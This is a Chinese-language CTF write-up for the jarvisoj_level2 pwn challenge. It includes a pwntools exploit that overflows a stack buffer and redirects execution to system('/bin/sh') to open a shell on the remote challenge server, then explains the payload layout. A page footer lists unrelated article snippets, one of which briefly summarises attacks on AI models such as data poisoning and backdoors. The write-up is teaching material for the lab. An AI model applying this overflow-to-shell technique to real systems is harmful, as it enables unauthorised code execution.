jarvisoj_level2

首先检查checksec

可以看见no canary found

说明可能是栈溢出

运行一下程序

随便输一个,得到hello world(感觉这一步好像没啥用,没有RE那用)

IDA 32 打开

后门

漏洞点

buf:

代码思路:利用溢出,把buf填满,然后构造程序,得到获取shell的目的

exp来自

BUUCTF—jarvisoj_level2 - 予柒 - 博客园 (cnblogs.com)

from pwn import*r=remote('node5.buuoj.cn',27695)
shell_addr=0x804a024
system=0x8048320
payload=b'a'*(0x88+4)+p32(system)+p32(6)+p32(shell_addr)
r.sendline(payload)
r.interactive()

这里解释一下代码

payload就是溢出,然后p32 就是调用system,然后后面紧跟着就是p32(6),这个你随便填都行

因为32构造就是 地址+下一次返回地址+参数

只是格式需要

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/32490.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Qt】学习Day1

文章目录 Qt简介创建第一个Qt程序创建过程介绍main函数工程文件头文件控件源文件快捷键按钮控件常用API对象树坐标系 信号和槽自定义信号自定义槽函数触发自定义的信号案例-下课后,老师触发饿了信号,学生响应信号,请客吃饭重载信号连接信号La…

containerd的客户端工具ctr命令

containerd的客户端工具ctr命令 类似docker为docker-shim容器运行时的客户端工具,ctr 是 containerd 的客户端工具,安装containerd作为容器运行时后,会自动安装ctr。 rootmaster1:~# ctr -v ctr github.com/containerd/containerd 1.7.121.…

Paxos分布式共识算法

Paxos分布式共识算法 一、简介 Paxos算法是由莱斯利兰伯特(Leslie Lamport)于1990年提出的一种基于消息传递且具有高度容错特性的一致性算法。它主要用于解决分布式系统中如何就某个值达成一致,并保证整个系统的一致性,即使在部分节点发生故障的情况下…

论文浅尝 | 基于生成模型的多模态实体链接

笔记整理:郭凌冰,浙江大学博士,研究方向为知识图谱 链接:https://arxiv.org/abs/2306.12725 1. 动机 多模态实体链接(Multimodal Entity Linking,MEL)旨在将带有多模态上下文的提及映射到知识库…

[SAP ABAP] 运算符

1.算数运算符 算术运算符描述加法-减法*乘法/除法MOD取余 示例1 输出结果: 输出结果: 2.比较运算符 比较运算符描述示例 等于 A B A EQ B <> 不等于 A <> B A NE B >大于 A > B A GT B <小于 A < B A LT B >大于或等于 A > B A GE B <小…

keep-alive实现页面缓存

<!--router-view 实现页面缓存--> <router-view v-slot"{Component}"><keep-alive :max"8"><component :is"Component"></component></keep-alive> </router-view>

Ansible调优之 Pipelining(任务流水线)详解

目录 Ansible 中的 Pipelining&#xff08;任务流水线&#xff09;详解Pipelining 的工作原理如何启用 PipeliningPipelining 的影响使用场景 什么是 requiretty&#xff1f;启用 requiretty 的影响禁用 requiretty 的方法 Ansible 中的 Pipelining&#xff08;任务流水线&…

2024年6月23日 十二生肖 今日运势

小运播报&#xff1a;2024年6月23日&#xff0c;星期日&#xff0c;农历五月十八 &#xff08;甲辰年庚午月戊午日&#xff09;&#xff0c;法定节假日。今天国际奥林匹克日&#xff0c;坚不可摧的意志&#xff0c;披荆斩棘的豪情&#xff0c;永远值得拥有&#xff01; 红榜生…

算法金 | 统计学的回归和机器学习中的回归有什么差别?

大侠幸会&#xff0c;在下全网同名「算法金」 0 基础转 AI 上岸&#xff0c;多个算法赛 Top 「日更万日&#xff0c;让更多人享受智能乐趣」 统计学中的回归 目标&#xff1a; 主要用于解释和推断自变量&#xff08;independent variables&#xff09;和因变量&#xff08;de…

array_key_exists() expects parameter 2 to be array, null given

公众号获取微信服务器IP地址 错误代码如下 public function getwxIP(){//获取微信服务器IP地址$accessToken $this->getwxoaiAccessToken();$userToken new UserToken();$result $userToken->curl_get("https: //api.weixin.qq.com/cgi-bin/get_api_domain_ip…

Chromium 调试指南2024 - 远程开发(上)

1. 引言 在现代软件开发过程中&#xff0c;远程开发已成为一种流行的工作方式。随着云计算和网络技术的迅猛发展&#xff0c;开发者不再局限于本地环境进行编码、测试和调试&#xff0c;而是可以借助远程服务器强大的计算资源和灵活的配置进行开发工作。远程开发不仅提升了开发…

PyTorch nn.CrossEntropyLoss() 交叉熵损失函数详解和要点提醒

文章目录 前置知识nn.CrossEntropyLoss() 交叉熵损失参数数学公式带权重的公式&#xff08;weight&#xff09;标签平滑&#xff08;label_smoothing&#xff09; 要点 附录参考链接 前置知识 深度学习&#xff1a;关于损失函数的一些前置知识&#xff08;PyTorch Loss&#x…

如何在Java中实现高效的文件读写

如何在Java中实现高效的文件读写 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; 在Java开发中&#xff0c;文件读写是一项常见且必不可少的操作。然而&#x…

vue判断是不是最新的请求接口返回的数据

有时候一个页面&#xff0c;我们可能会重复请求同一个接口&#xff0c;但是请求参数不同&#xff0c;如果第一个参数请求接口了&#xff0c;我们又使用第二个参数请求同一个接口了&#xff0c;但是第二个参数请求先返回数据&#xff0c;然后第一个参数才返回数据&#xff0c;这…

Day58 代码随想录打卡|二叉树篇---将有序数组转换为二叉搜索树

题目&#xff08;leecode T108&#xff09;&#xff1a; 给你一个整数数组 nums &#xff0c;其中元素已经按 升序 排列&#xff0c;请你将其转换为一棵 平衡 二叉搜索树。 方法&#xff1a;用有序数组构造平衡二叉搜索树&#xff0c;和我们之前有一题的思路差不多&#xff0c…

win11中截屏的快捷方式

在 Windows 11 中&#xff0c;有多种方式可以进行截屏&#xff08;屏幕截图&#xff09;&#xff0c;这里是一些常用的快捷方式&#xff1a; 全屏截图保存至剪贴板&#xff1a; 按 PrtScn &#xff08;打印屏幕键&#xff09;。这会把整个屏幕的截图保存到剪贴板&#xff0c;你…

遗传算法求解时间窗车辆路径规划问题(附python代码)

摘要 本研究提出了一种基于遗传算法的车辆路径规划&#xff08;VRP&#xff09;问题求解框架&#xff0c;它能够有效地处理一系列复杂约束&#xff0c;包括软时间窗、硬时间窗、行驶距离限制、车辆最大载重量、多个配送中心的协调、特定的配送顺序&#xff0c;以及多种车型的选…

【总结】攻击 AI 模型的方法

数据投毒 污染训练数据 后门攻击 通过设计隐蔽的触发器&#xff0c;使得模型在正常测试时无异常&#xff0c;而面对触发器样本时被操纵输出。后门攻击可以看作是特殊的数据投毒&#xff0c;但是也可以通过修改模型参数来实现 对抗样本 只对输入做微小的改动&#xff0c;使模型…

Python学习打卡:day13

day13 笔记来源于&#xff1a;黑马程序员python教程&#xff0c;8天python从入门到精通&#xff0c;学python看这套就够了 目录 day1397、初识对象98、类的成员方法类的定义和使用成员变量和成员方法成员方法的定义语法 99、类和对象在程序中通过类来描述基于类创建对象 100、…

Javaweb登录校验

登录校验 JWT令牌的相关操作需要添加相关依赖 <dependency><groupId>io.jsonwebtoken</groupId><artifactId>jjwt</artifactId><version>0.9.1</version> </dependency>一、摘要 场景&#xff1a;当我们想要访问一个网站时&am…